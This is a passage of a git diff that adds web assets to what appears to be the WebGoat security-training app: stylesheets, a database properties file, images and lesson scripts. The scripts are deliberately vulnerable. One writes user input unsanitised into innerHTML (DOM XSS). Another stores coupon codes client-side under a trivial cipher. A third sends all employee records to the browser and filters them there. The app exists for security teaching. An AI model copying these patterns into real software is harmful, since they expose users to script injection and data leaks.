+#hMenuBar {position:absolute;left:245px;top:108px;width:538px;height:22px;z-index:2;}
diff --git a/main/project/WebContent/css/lesson.css b/main/project/WebContent/css/lesson.css
new file mode 100644
index 000000000..ba0229b96
--- /dev/null
+++ b/main/project/WebContent/css/lesson.css
@@ -0,0 +1,11 @@
+body.page {color: #000000;font-family: Verdana, Tahoma, sans-serif;font-size: 8pt;}
+td {font-family: Verdana, Tahoma, sans-serif;font-size: 8pt; }
+tr {font-family: Verdana, Tahoma, sans-serif;}
+span {font-family: Verdana, Tahoma, sans-serif;}
+.f8-0 {font-size: 8pt;font-family: Verdana, Tahoma, sans-serif;}
+.f8-1 {font-size: 8pt;font-family: Verdana, Tahoma, sans-serif;}
+.div_tree {padding-left:10px;overflow:visible;}
+.report_tree_link {width:100%;font-size: 8pt;font-family: Verdana, Tahoma, sans-serif;margin-left:2px;padding-right:2px;margin-top:2px;border-spacing:0px;}
+.form_link {font-size: 8pt;font-family: Verdana, Tahoma, sans-serif;font-weight: bold;}
+.report_title {font-size: 8pt;font-family: Verdana, Tahoma, sans-serif;border: 1px solid #afafaf;background-color: #cfcfef;margin-top:3px;margin-bottom:3px;margin-left:1px;padding:3px;font-weight: bold;}
+.middle {vertical-align:middle;}
\ No newline at end of file
diff --git a/main/project/WebContent/css/menu.css b/main/project/WebContent/css/menu.css
new file mode 100644
index 000000000..0436f5aeb
--- /dev/null
+++ b/main/project/WebContent/css/menu.css
@@ -0,0 +1,11 @@
+.pviimenudiv td {font-family: "Trebuchet MS", Arial, sans-serif; font-size: 10px}
+.pviimenudiv p {font-family: "Trebuchet MS", Arial, sans-serif; font-size: 10px; margin-top: 12px; margin-bottom: 6px}
+.pviimenudiv b {font-family: Verdana, Arial, Helvetica, sans-serif; font-style: normal; color: #666666}
+.pviimenudiv a:link {color: #333333; text-decoration: underline}
+.pviimenudiv a:visited {color: #0066FF; text-decoration: underline}
+.pviimenudiv a:hover {color: red; text-decoration: underline}
+.pviimenudiv a:active {color: #0066FF; text-decoration: underline}
+.pviimenudivstage a:link {color: #333333; font-size: 9px; display: block; margin-left: 2em; }
+.pviimenudivstage a:visited {color: #0066FF; font-size: 9px;  display: block; margin-left: 2em; }
+.pviimenudivstage a:hover {color: red; font-size: 9px;  display: block; margin-left: 2em; }
+.pviimenudivstage a:active {color: #0066FF; font-size: 9px;  display: block; margin-left: 2em; }
diff --git a/main/project/WebContent/css/webgoat.css b/main/project/WebContent/css/webgoat.css
new file mode 100644
index 000000000..25d7eeaf9
--- /dev/null
+++ b/main/project/WebContent/css/webgoat.css
@@ -0,0 +1,274 @@
+body{ 
+	min-width: 800px;
+	font-family: Arial,sans-serif;
+	color: #333333;
+	line-height: 1.166;	
+	margin: 0px;
+	padding: 0px;
+}
+
+a:link, a:visited, a:hover {
+	color: #666666;
+	text-decoration: none;
+}
+
+a:hover {
+	text-decoration: underline;
+	color: red;
+}
+
+h1, h2, h3, h4, h5, h6 {
+	font-family: Arial,sans-serif;
+	margin: 0px;
+	padding: 0px;
+}
+
+h1{
+	font-family: Verdana,Arial,sans-serif;
+	font-size: 120%;
+	color: #333333;
+}
+
+h2{
+	font-size: 114%;
+	color: #333333;
+}
+
+h3{
+	font-size: 100%;
+	color: #334d55;
+}
+
+h4{
+	font-size: 100%;
+	font-weight: normal;
+	color: #333333;
+}
+
+h5{
+	font-size: 100%;
+	color: #334d55;
+}
+
+ul{
+	list-style-type: square;
+}
+
+ul ul{
+	list-style-type: disc;
+}
+
+ul ul ul{
+	list-style-type: none;
+}
+
+#navBar{
+	margin: 0 79% 0 0;
+	padding: 0px;
+	background-color: #999999;
+}
+
+#twoCol{
+	margin: 0;
+	padding-left: 13px;
+}
+
+#siteName{
+	margin: 0px;
+	padding: 0px 0px 10px 10px;
+}
+
+#lessonName{
+	padding: 5px 0px 10px 10px;
+}
+
+#globalNav{
+	color: #cccccc;
+	padding: 0px 10px;
+	white-space: nowrap;
+}
+
+#globalNav img{
+	display: block;
+}
+
+#globalNav a {
+	font-size: 10px;
+	padding: 0px 4px 0px 0px; 
+}
+
+.lessonContent{
+	padding: 10px 10px 10px 10px; 
+	font-size: 10px;
+}
+
+.lessonText h3{
+	padding: 30px 0px 5px 0px;
+	text-align: center;
+}
+
+.lessonText img{
+	float: left;
+	padding: 0px 10px 0px 0px;
+	margin: 0 5px 5px 0;
+}
+
+#bottom{
+	color: #999999;
+	clear: both;
+	font-size: 10px;
+	padding-top: 5px;
+}
+
+#navBar ul a:link, #navBar ul a:visited {}
+
+#navBar ul {
+	list-style: none; 
+	margin: 0; 
+	padding: 0;
+}
+
+/* hack to fix IE/Win's broken rendering of block-level anchors in lists */
+#navBar li {}
+
+/* fix for browsers that don't need the hack */
+html>body #navBar li {}
+
+#top{
+	height:136px;
+	background-image: url(../images/header/header.jpg);
+	width: 800px;
+}
+
+#top_challenge{
+	height:136px;
+	width: 800px;
+}
+
+#topLinks{
+	position: relative;
+	margin: 0px;
+	padding: 0px;
+	font-size: small;
+}
+
+#topLinks h3{
+	padding: 10px 0px 2px 10px;
+}
+
+#topLinks a:link{
+	padding: 2px 0px 2px 10px;
+	width: 100%;voice-family: "\"}\""; 
+	voice-family:inherit;
+	width: auto;
+}
+
+#topLinks a:visited{
+	border-top: 1px solid #cccccc;
+	padding: 2px 0px 2px 10px;
+}
+
+#topLinks a:hover{
+	background-color: #FFFFFF;
+	padding: 5px 2px 2px 10px;
+}
+
+#menuSpacer {
+	float: left;
+	width: 225px;
+}
+
+#lessonArea {
+	float: right;
+	width: 540px;
+	height: 100%;
+	padding: 10px;
+}
+
+#wrap {
+	width: 800px;
+	word-wrap:break-word; /* Fixes IE wrapping issue */
+}
+
+#topRight {
+	position:absolute;
+	left:715px;
+	top:0px;
+	width:75px;
+	height:23px;
+	z-index:3;
+	float: right;
+}
+
+#topRightInner {
+	position:absolute;
+	left:450px;
+	top:10px;
+	width:300px;
+	height:23px;
+	z-index:4;
+	float: right;
+}
+
+.info {
+	color: red; 
+	font-weight: bold;
+}
+
+#reset {
+	text-align: right;
+	font-weight: bold;
+	margin-bottom: 10px;
+}
+
+#hint{}
+#parameter{}
+#cookie{}
+#message{
+	margin-bottom: 20px;
+	margin-top: 10px;
+}
+
+#lessonPlans {
+	border: 1px solid #000000;
+	background-color: #FFFFFF;
+	margin: 15px;
+	padding: 25px;
+	padding-bottom: 75px;
+}
+
+#credits {
+	float: right;
+}
+
+#start {
+	height: 390px;
+	width: 700px;
+	padding: 10px 50px 10px 50px;
+	font-size: 15px;
+}
+#warning {
+	border: 1px solid #666666;
+	padding: 10px;
+	font-size: 10px;
+	color: #FF3300;
+	width: 600px;
+	margin-left: 100px;
+	margin-right: 100px;
+}
+#team {
+	width: 580px;
+	margin-right: 50px;
+	margin-left: 50px;
+	padding-top: 5px;
+	padding-right: 10px;
+	padding-bottom: 5px;
+	padding-left: 10px;
+}
+.style1 {
+	font-size: 11px;
+	font-weight: bold;
+}
+.style2 {
+	font-size: 10px;
+}
\ No newline at end of file
diff --git a/main/project/WebContent/css/webgoat_challenge.css b/main/project/WebContent/css/webgoat_challenge.css
new file mode 100644
index 000000000..b72336e5a
--- /dev/null
+++ b/main/project/WebContent/css/webgoat_challenge.css
@@ -0,0 +1,42 @@
+#bottom_ch{
+	color: #999999;
+	clear: both;
+	font-size: 10px;
+	padding-top: 5px;
+}
+
+#top_ch{
+	height:86px;
+	width: 500px;
+}
+
+#wrap_ch {
+	width: 500px;
+}
+
+#credits_ch {
+	float: right;
+}
+
+#start_ch {
+	height: 300px;
+	padding: 10px 50px 10px 50px;
+	font-size: 12px;
+}
+#warning_ch {
+	border: 1px solid #666666;
+	padding: 10px;
+	font-size: 10px;
+	color: #FF3300;
+	width: 400px;
+	margin-left: 50px;
+}
+#team_ch {
+}
+.style1_ch {
+	font-size: 10px;
+	font-weight: bold;
+}
+.style2_ch {
+	font-size: 10px;
+}
diff --git a/main/project/WebContent/database/database.prp b/main/project/WebContent/database/database.prp
new file mode 100644
index 000000000..70115d276
--- /dev/null
+++ b/main/project/WebContent/database/database.prp
@@ -0,0 +1,365 @@
+!---------------------------------------------------------------------
+!
+! BASIC PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! Path where index tables are held. Can be absolute or relative 
+! to the properties file. Defaults to tablePath.
+!
+indexPath=./indexes
+!
+! Path where system tables are held. Can be absolute or relative to 
+! the properties file. Defaults to tablePath.
+!
+systemPath=./system
+!
+! Path where database tables are held. Can be absolute or relative 
+! to the properties file. Defaults to "current" directory.
+!
+tablePath=./tables
+!
+! Path where results set tables are held. Can be absolute or relative 
+! to the properties file. Defaults to tablePath.
+!
+tmpPath=./tmp
+!
+! Non-zero means paths are relative to the properties file. 
+! Default is absolute paths for files.
+!
+relativeToProperties=1
+!
+! Alternative partitions can be defined so that tables can be placed
+! in multiple locations. Each partition is numbered: 1, 2, 3,... Tables
+! can be created on partitions using the syntax 
+!
+!   CREATE TABLE <name> ON PARTITION <number>...
+!
+! The partition count has to be supplied.
+!
+!partitionCount=2
+!
+! The locations of each partition must be supplied. These are always
+! absolute path names.
+!
+!partition1=d:/petes
+!partition2=c:/temp
+
+
+!---------------------------------------------------------------------
+!
+! TUNING PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! The amount of each column to cache, expressed either as an absolute 
+! number of rows or as a percentage figure. Defaults to 256 or 10 respectively.
+!
+! This value applies only when tables are first created. It has no effect
+! when a table is being re-opened.
+!
+cacheAmount=512
+!
+! CACHE_ROWS Must be one of CACHE_ROWS or CACHE_PERCENT. Determines whether 
+! to cache columns in tables based on an absolute number of rows, or the 
+! percentage number of rows in the table. 
+!
+! This value applies only when tables are first created. It has no effect
+! when a table is being re-opened.
+!
+cacheCondition=CACHE_ROWS
+!
+! The amount of the system tables to be cached. Defaults to 100.
+!
+! This value applies only when tables are first created. It has no effect
+! when a table is being re-opened.
+!
+!systemCacheSize=10
+!
+! Similar to cacheCondition, but applies only to the system tables.
+!
+! This value applies only when tables are first created. It has no effect
+! when a table is being re-opened.
+!
+!systemCacheCondition=CACHE_ROWS
+!
+! The percentage cache hit improvement required in order to move the 
+! cache to a new location in a column. 
+!
+! (Currently not implemented).
+!
+cacheResetPercent=10
+!
+! Non-zero means that database changes do not get written to the 
+! database immediately. See tuning.html. 
+!
+fastUpdate=0
+!
+! Percentage of free space in an index that must be present before 
+! the index reorganises itself. High values means frequent index
+! reorganisation. Low values means slow index inserts.
+!
+indexLoad=5
+!
+! The number of cache misses to include in calculations of the next 
+! base for the cache. 
+!
+! (Currently not implemented).
+!
+missesInCacheStats=100
+!
+! Non-zero means that results sets get instantiated on disk. By default
+! InstantDB holds results sets emtirely in memory (apart from Binary
+! columns). For large results sets this can be a problem. This property
+! forces all results sets to be held on disk.
+!
+resultsOnDisk=0
+!
+! Similar to cacheCondition but applies only to disk based
+! results sets. Default is CACHE_ROWS.
+!
+resultsSetCache=CACHE_ROWS
+!
+! Similar to cacheAmount but applies only to disk based
+! results sets. Default is 100.
+!
+resultsSetCacheAmount=100
+!
+! Number of rows to read into the disk read ahead buffer. 
+! Recommended to be set somewhere around 128 to 256. 
+! Default is 20.
+!
+rowCacheSize=128
+!
+! The read ahead buffer is effective at speeding up full
+! table scans. However for indexed lookups or multiple
+! simultaneous scans it is better to read a single row at
+! a time. Each table holds a small number of single row
+! buffers to improve such operations. Default is 8.
+!
+!singleRowCount=4
+!
+! Sometimes the look ahead buffer can be held by a single
+! thread even though it is not retrieveing many values from it.
+! If too many lookups retrieve data from the single row
+! buffers then it is better to flush the look ahead buffer and
+! make it available for re-use. Default is 128.
+!
+!flushAfterCacheMisses=64
+!
+! Number of rows to read ahead for system tables. By default
+! system tables cache everything, so it is wasteful to have large
+! read ahead buffers since they will very rarely be used. This
+! allows the size of the system read ahead buffers to be reduced
+! if necessary. Defaults to rowCacheSize.
+!
+!systemRows=20
+!
+! The control column in all tables normally has a large cache
+! since this speeds up all operation on that table. This can be
+! varied to either improve performance or to reduce space.
+! default is 8192.
+!
+! This value applies only when tables are first created. It has no effect
+! when a table is being re-opened.
+!
+!controlColCacheSize=512
+!
+! By default, InstantDB only does a cursory search for deleted rows during 
+! UPDATE statements. Setting searchDeletes=1 causes more detailed searches 
+! for deleted rows. This slows down UPDATE executions, but reults in more 
+! compact tables.  Default is 0.
+!
+searchDeletes=0
+!
+! The interval, in milliseconds, between checks for statement execution
+! timeouts. Default is 5000.
+!
+!timerCheck=5000
+!
+! The number of statements between checks on available memory. If set
+! to 100 (say), then every 100 statements, InstantDB will check to
+! see how much memory is still free. If too little is avilable (see
+! below) then java.lang.System.gc() is called.
+!
+! If set to zero (the default) then no memory checking takes place.
+!
+!garbageCollectStatements=100
+!
+! If InstantDB is performing period memory checks (see above) then
+! this is the value in percent of available memory that must be
+! used before System.gc() gets called.
+!
+!garbageCollectPercent=70
+
+!---------------------------------------------------------------------
+!
+! LOGGING AND DEBUGGING PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! Non-zero means include SQL statements in the export file. 
+!
+exportSQL=0
+!
+! Non-zero means trace output also directed to console. 
+! Defaults to 0.
+!
+traceConsole=1
+!
+! Relative or absolute path where exporting and tracing goes.
+!
+! NOTE - A relative path is relative to the current Java
+! runtime directory. It is *not* relative to this properties
+! file. This is regardless of the relativeToProperties
+! setting above.
+!
+traceFile=./trace.log
+!
+! Bitmap of various items that can be traced. See debug.html. 
+! Defaults to 0.
+!
+traceLevel=2
+
+!---------------------------------------------------------------------
+!
+! TRANSACTION AND RECOVERY PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! 0 means do not perform recovery on startup.
+! 1 means perform automatic recovery
+! 2 (default) means prompt the user using standard in 
+!
+recoveryPolicy=1
+!
+! Sets the level of transaction journalling. See trans.html.
+! Defaults to 1.
+!
+! 0 - No journalling takes place.
+! 1 - Normal journalling (default).
+! 2 - Full journalling.
+!
+transLevel=1
+!
+! When doing an import, defines the number of rows imported 
+! before the transaction is committed. Recommended value 8192.
+! defaults to 100.
+!
+transImports=100
+!
+! Sets the default transaction isolation level. This is a complex
+! topic, but basically, the higher the level, the more locking
+! goes on. The allowed values are:
+!
+!   TRANSACTION_READ_UNCOMMITTED = 1
+!   TRANSACTION_READ_COMMITTED   = 2
+!   TRANSACTION_REPEATABLE_READ  = 4
+!   TRANSACTION_SERIALIZABLE     = 8 (default)
+!
+! SERIALIZABLE means that InstantDB takes exclusive access to all
+! tables in a transaction until the transaction completes. Even if
+! the transaction only performs reads.
+!
+! REPEATABLE_READ transactions takes read locks for SELECTs and
+! write locks for everything else. All locks released on transaction
+! completion.
+!
+! READ_COMMITTED transactions are the same as REPEATABLE_READ 
+! except that read locks get freed on statement completion.
+!
+! READ_UNCOMMITTED transactions do not take read locks. A result
+! set can include data being modified by another transaction.
+!
+!defaultIsolationLevel=2
+
+!---------------------------------------------------------------------
+!
+! DATE, TIME AND CURRENCY PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! Number of digits after decimal point in currency outputs. Defaults to 2.
+!
+currencyDecimal=2
+!
+! Currency symbol used in currency outputs. Defaults to $.
+!
+currencySymbol=$
+!
+! Default format for date columns. Defaults to "yyyy-mm-dd".
+!
+!dateFormat=yyyy-mm-dd
+!
+! Default format for timestamp columns. Defaults to "yyyy-mm-dd hh:nn:ss.lll".
+!
+!dateTimeFormat=yyyy-mm-dd hh:nn:ss.lll
+!
+! Default format for time columns. Defaults to "hh:nn:ss.lll".
+!
+!timeFormat=hh:nn:ss.lll
+!
+! If set, then all two digit dates less than its value are interpreted 
+! as 21st century dates. 
+!
+!milleniumBoundary=50
+!
+! Set to 1 causes the date string "now" to store a full timestamp. 
+! Default is to store only the date for fields with now hour in the 
+! format string.
+!
+nowMeansTime=0
+
+!---------------------------------------------------------------------
+!
+! STRING HANDLING PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! If set to 1 then String hashes use the JDK Object.hashCode() function.
+! By default, uses InstantDB's String hashing.
+!
+altStringHashing=0
+!
+! Set to 1 to cause LIKE clauses to always perform case insensitive 
+! comparisons. 
+!
+likeIgnoreCase=0
+!
+! Same as SET LITERAL STRICT_ON. Prevents string literals being interpreted
+! as column names or numbers. Default is 0.
+!
+strictLiterals=0
+!
+! Set this value to 1 (one) if you would like PreparedStatement.setString()
+! to ignore "\" (backslash) characters when proceesing string constants.
+! When set, InstantDB will not attempt to interpret \ as the start of an
+! escape sequence. Default is 0.
+!
+!prepareIgnoresEscapes=1
+
+!---------------------------------------------------------------------
+!
+! MISCELLANEOUS PROPERTIES
+!
+!---------------------------------------------------------------------
+
+!
+! Allows selected InstantDB keywords to be un-reserved. 
+! e.g. ignoreKeywords=url,quote would allow the keywords 
+! url and quote to be used as table or column names. 
+!
+! This faciliy is provided for compatatbility reasons only.
+! It's use is not recommended AND IS NOT SUPPORTED.
+!
+!ignoreKeywords
+!
+! Non-zero means database is opened in read only mode.
+!
+readOnly=0
diff --git a/main/project/WebContent/images/buttons/catStarted.jpg b/main/project/WebContent/images/buttons/catStarted.jpg
new file mode 100644
index 000000000..447e39d5d
Binary files /dev/null and b/main/project/WebContent/images/buttons/catStarted.jpg differ
diff --git a/main/project/WebContent/images/buttons/cookies.jpg b/main/project/WebContent/images/buttons/cookies.jpg
new file mode 100644
index 000000000..ce23a1af0
Binary files /dev/null and b/main/project/WebContent/images/buttons/cookies.jpg differ
diff --git a/main/project/WebContent/images/buttons/cookiesOver.jpg b/main/project/WebContent/images/buttons/cookiesOver.jpg
new file mode 100644
index 000000000..6a6f918e7
Binary files /dev/null and b/main/project/WebContent/images/buttons/cookiesOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/help.jpg b/main/project/WebContent/images/buttons/help.jpg
new file mode 100644
index 000000000..3d409d1fa
Binary files /dev/null and b/main/project/WebContent/images/buttons/help.jpg differ
diff --git a/main/project/WebContent/images/buttons/helpOver.jpg b/main/project/WebContent/images/buttons/helpOver.jpg
new file mode 100644
index 000000000..f5a6759dc
Binary files /dev/null and b/main/project/WebContent/images/buttons/helpOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/hint.jpg b/main/project/WebContent/images/buttons/hint.jpg
new file mode 100644
index 000000000..ab14f704b
Binary files /dev/null and b/main/project/WebContent/images/buttons/hint.jpg differ
diff --git a/main/project/WebContent/images/buttons/hintLeft.jpg b/main/project/WebContent/images/buttons/hintLeft.jpg
new file mode 100644
index 000000000..11c9672e3
Binary files /dev/null and b/main/project/WebContent/images/buttons/hintLeft.jpg differ
diff --git a/main/project/WebContent/images/buttons/hintLeftOver.jpg b/main/project/WebContent/images/buttons/hintLeftOver.jpg
new file mode 100644
index 000000000..b2ffde62a
Binary files /dev/null and b/main/project/WebContent/images/buttons/hintLeftOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/hintOver.jpg b/main/project/WebContent/images/buttons/hintOver.jpg
new file mode 100644
index 000000000..add0b55a2
Binary files /dev/null and b/main/project/WebContent/images/buttons/hintOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/hintRight.jpg b/main/project/WebContent/images/buttons/hintRight.jpg
new file mode 100644
index 000000000..6ad8a308f
Binary files /dev/null and b/main/project/WebContent/images/buttons/hintRight.jpg differ
diff --git a/main/project/WebContent/images/buttons/hintRightOver.jpg b/main/project/WebContent/images/buttons/hintRightOver.jpg
new file mode 100644
index 000000000..0d3e6b084
Binary files /dev/null and b/main/project/WebContent/images/buttons/hintRightOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/html.jpg b/main/project/WebContent/images/buttons/html.jpg
new file mode 100644
index 000000000..6a35166ca
Binary files /dev/null and b/main/project/WebContent/images/buttons/html.jpg differ
diff --git a/main/project/WebContent/images/buttons/htmlOver.jpg b/main/project/WebContent/images/buttons/htmlOver.jpg
new file mode 100644
index 000000000..f02407eb8
Binary files /dev/null and b/main/project/WebContent/images/buttons/htmlOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/java.jpg b/main/project/WebContent/images/buttons/java.jpg
new file mode 100644
index 000000000..c150194fd
Binary files /dev/null and b/main/project/WebContent/images/buttons/java.jpg differ
diff --git a/main/project/WebContent/images/buttons/javaOver.jpg b/main/project/WebContent/images/buttons/javaOver.jpg
new file mode 100644
index 000000000..f1c62fb4a
Binary files /dev/null and b/main/project/WebContent/images/buttons/javaOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/lessonComplete.jpg b/main/project/WebContent/images/buttons/lessonComplete.jpg
new file mode 100644
index 000000000..e46ad6e1f
Binary files /dev/null and b/main/project/WebContent/images/buttons/lessonComplete.jpg differ
diff --git a/main/project/WebContent/images/buttons/logout.jpg b/main/project/WebContent/images/buttons/logout.jpg
new file mode 100644
index 000000000..c22f7acce
Binary files /dev/null and b/main/project/WebContent/images/buttons/logout.jpg differ
diff --git a/main/project/WebContent/images/buttons/logoutOver.jpg b/main/project/WebContent/images/buttons/logoutOver.jpg
new file mode 100644
index 000000000..bef8a9133
Binary files /dev/null and b/main/project/WebContent/images/buttons/logoutOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/params.jpg b/main/project/WebContent/images/buttons/params.jpg
new file mode 100644
index 000000000..55a43fa6f
Binary files /dev/null and b/main/project/WebContent/images/buttons/params.jpg differ
diff --git a/main/project/WebContent/images/buttons/paramsOver.jpg b/main/project/WebContent/images/buttons/paramsOver.jpg
new file mode 100644
index 000000000..c51a7b5e9
Binary files /dev/null and b/main/project/WebContent/images/buttons/paramsOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/plans.jpg b/main/project/WebContent/images/buttons/plans.jpg
new file mode 100644
index 000000000..1640b43e1
Binary files /dev/null and b/main/project/WebContent/images/buttons/plans.jpg differ
diff --git a/main/project/WebContent/images/buttons/plansOver.jpg b/main/project/WebContent/images/buttons/plansOver.jpg
new file mode 100644
index 000000000..1c8c07bdc
Binary files /dev/null and b/main/project/WebContent/images/buttons/plansOver.jpg differ
diff --git a/main/project/WebContent/images/buttons/solutions.jpg b/main/project/WebContent/images/buttons/solutions.jpg
new file mode 100644
index 000000000..365e33d29
Binary files /dev/null and b/main/project/WebContent/images/buttons/solutions.jpg differ
diff --git a/main/project/WebContent/images/buttons/solutionsOver.jpg b/main/project/WebContent/images/buttons/solutionsOver.jpg
new file mode 100644
index 000000000..a9cc30306
Binary files /dev/null and b/main/project/WebContent/images/buttons/solutionsOver.jpg differ
diff --git a/main/project/WebContent/images/header/header.jpg b/main/project/WebContent/images/header/header.jpg
new file mode 100644
index 000000000..9015c9299
Binary files /dev/null and b/main/project/WebContent/images/header/header.jpg differ
diff --git a/main/project/WebContent/images/header/header_ASP.jpg b/main/project/WebContent/images/header/header_ASP.jpg
new file mode 100644
index 000000000..0bf017439
Binary files /dev/null and b/main/project/WebContent/images/header/header_ASP.jpg differ
diff --git a/main/project/WebContent/images/header/header_CShrp.jpg b/main/project/WebContent/images/header/header_CShrp.jpg
new file mode 100644
index 000000000..81b610ecf
Binary files /dev/null and b/main/project/WebContent/images/header/header_CShrp.jpg differ
diff --git a/main/project/WebContent/images/header/header_coldFusion.jpg b/main/project/WebContent/images/header/header_coldFusion.jpg
new file mode 100644
index 000000000..ecb3e78ff
Binary files /dev/null and b/main/project/WebContent/images/header/header_coldFusion.jpg differ
diff --git a/main/project/WebContent/images/header/header_dotNet.jpg b/main/project/WebContent/images/header/header_dotNet.jpg
new file mode 100644
index 000000000..30f59ffed
Binary files /dev/null and b/main/project/WebContent/images/header/header_dotNet.jpg differ
diff --git a/main/project/WebContent/images/icons/rightArrow.jpg b/main/project/WebContent/images/icons/rightArrow.jpg
new file mode 100644
index 000000000..b89abbb19
Binary files /dev/null and b/main/project/WebContent/images/icons/rightArrow.jpg differ
diff --git a/main/project/WebContent/images/logos/aspect.jpg b/main/project/WebContent/images/logos/aspect.jpg
new file mode 100644
index 000000000..b88015ed5
Binary files /dev/null and b/main/project/WebContent/images/logos/aspect.jpg differ
diff --git a/main/project/WebContent/images/logos/macadamian.gif b/main/project/WebContent/images/logos/macadamian.gif
new file mode 100644
index 000000000..78026f3df
Binary files /dev/null and b/main/project/WebContent/images/logos/macadamian.gif differ
diff --git a/main/project/WebContent/images/logos/owasp.jpg b/main/project/WebContent/images/logos/owasp.jpg
new file mode 100644
index 000000000..3934b7a49
Binary files /dev/null and b/main/project/WebContent/images/logos/owasp.jpg differ
diff --git a/main/project/WebContent/images/logos/parasoft.jpg b/main/project/WebContent/images/logos/parasoft.jpg
new file mode 100644
index 000000000..2f13e5e05
Binary files /dev/null and b/main/project/WebContent/images/logos/parasoft.jpg differ
diff --git a/main/project/WebContent/images/menu_images/1x1.gif b/main/project/WebContent/images/menu_images/1x1.gif
new file mode 100644
index 000000000..c95709f1a
Binary files /dev/null and b/main/project/WebContent/images/menu_images/1x1.gif differ
diff --git a/main/project/WebContent/javascript/DOMXSS.js b/main/project/WebContent/javascript/DOMXSS.js
new file mode 100644
index 000000000..9ddb31a10
--- /dev/null
+++ b/main/project/WebContent/javascript/DOMXSS.js
@@ -0,0 +1,5 @@
+function displayGreeting(name) {
+	if (name != ''){
+		document.getElementById("greeting").innerHTML="Hello, " + name+ "!";
+	}
+}
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/DOMXSS_backup.js b/main/project/WebContent/javascript/DOMXSS_backup.js
new file mode 100644
index 000000000..9ddb31a10
--- /dev/null
+++ b/main/project/WebContent/javascript/DOMXSS_backup.js
@@ -0,0 +1,5 @@
+function displayGreeting(name) {
+	if (name != ''){
+		document.getElementById("greeting").innerHTML="Hello, " + name+ "!";
+	}
+}
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/clientSideFiltering.js b/main/project/WebContent/javascript/clientSideFiltering.js
new file mode 100644
index 000000000..eeb662858
--- /dev/null
+++ b/main/project/WebContent/javascript/clientSideFiltering.js
@@ -0,0 +1,64 @@
+var dataFetched = false;
+
+
+function selectUser(){
+
+	var newEmployeeID = document.getElementById("UserSelect").options[document.getElementById("UserSelect").selectedIndex].value;
+	
+	document.getElementById("employeeRecord").innerHTML = document.getElementById(newEmployeeID).innerHTML;
+	
+}
+
+
+function fetchUserData(){
+	if(!dataFetched){
+		dataFetched = true;		
+		ajaxFunction(document.getElementById("userID").value);
+	}
+}
+
+
+
+
+
+function ajaxFunction(userId)
+  {
+	var xmlHttp;
+  try
+    {
+    // Firefox, Opera 8.0+, Safari
+    xmlHttp=new XMLHttpRequest();
+    }
+  catch (e)
+    {
+    // Internet Explorer
+    try
+      {
+      xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
+      }
+    catch (e)
+      {
+      try
+        {
+        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
+        }
+      catch (e)
+        {
+        alert("Your browser does not support AJAX!");
+        return false;
+        }
+      }
+    }
+    xmlHttp.onreadystatechange=function()
+      {
+      
+      var result = xmlHttp.responseText;
+      if(xmlHttp.readyState==4)
+        {
+        	document.getElementById("hiddenEmployeeRecords").innerHTML=result; 
+        	
+        }
+      }
+    xmlHttp.open("GET","lessons/Ajax/clientSideFiltering.jsp?userId=" + userId,true);
+    xmlHttp.send(null);
+  }
\ No newline at end of file
diff --git a/main/project/WebContent/javascript/clientSideValidation.js b/main/project/WebContent/javascript/clientSideValidation.js
new file mode 100644
index 000000000..f47c5b83e
--- /dev/null
+++ b/main/project/WebContent/javascript/clientSideValidation.js
@@ -0,0 +1,113 @@
+var coupons = ["nvojubmq",
+"emph",
+"sfwmjt",
+"faopsc",
+"fopttfsq",
+"pxuttfsq"];
+
+
+function isValidCoupon(coupon) {
+	coupon = coupon.toUpperCase();
+	for(var i=0; i<coupons.length; i++) {
+		decrypted = decrypt(coupons[i]);
+		if(coupon == decrypted){
+			ajaxFunction(coupon);
+			return true;
+		}
+	}
+	return false;	
+}
+
+
+
+
+function decrypt(code){
+
+	code = code.toUpperCase();
+
+	alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+	
+	caesar = '';
+
+	for (i = code.length ;i >= 0;i--){	
+	
+		for (j = 0;j<alpha.length;j++){		
+			
+			if(code.charAt(i) == alpha.charAt(j)){
+			
+				caesar = caesar + alpha.charAt((j+(alpha.length-1))%alpha.length);
+			}		
+		}
+	}	
+	return caesar;
+}
+
+function ajaxFunction(coupon)
+  {
+  
+  var xmlHttp;
+  try
+    {
+    // Firefox, Opera 8.0+, Safari
+    xmlHttp=new XMLHttpRequest();
+    }
+  catch (e)
+    {
+    // Internet Explorer
+    try
+      {
+      xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
+      }
+    catch (e)
+      {
+      try
+        {
+        xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
+        }
+      catch (e)
+        {
+        alert("Your browser does not support AJAX!");
+        return false;
+        }
+      }
+    }
+    xmlHttp.onreadystatechange=function()
+      {
+      if(xmlHttp.readyState==4)
+        {
+        document.form.GRANDTOT.value = document.form.SUBTOT.value * xmlHttp.responseText;
+        document.form.GRANDTOT.value = dollarRound(document.form.GRANDTOT.value);
+        }
+      }
+    xmlHttp.open("GET","lessons/Ajax/clientSideValidation.jsp?coupon=" + coupon,true);
+    xmlHttp.send(null);
+  }
+  
+  
+  function updateTotals(){
+
+	f = document.form;
+	
+	f.TOT1.value = dollarRound(f.QTY1.value * f.PRC1.value);
+	f.TOT2.value = dollarRound(f.QTY2.value * f.PRC2.value);
+	f.TOT3.value = dollarRound(f.QTY3.value * f.PRC3.value);
+	f.TOT4.value = dollarRound(f.QTY4.value * f.PRC4.value);
+	
+	f.SUBTOT.value = dollarRound(parseFloat(f.TOT1.value) + parseFloat(f.TOT2.value) + parseFloat(f.TOT3.value) + parseFloat(f.TOT4.value));
+
+	
+	f.GRANDTOT.value = f.SUBTOT.value;
+	
+	isValidCoupon(f.field1.value);
+
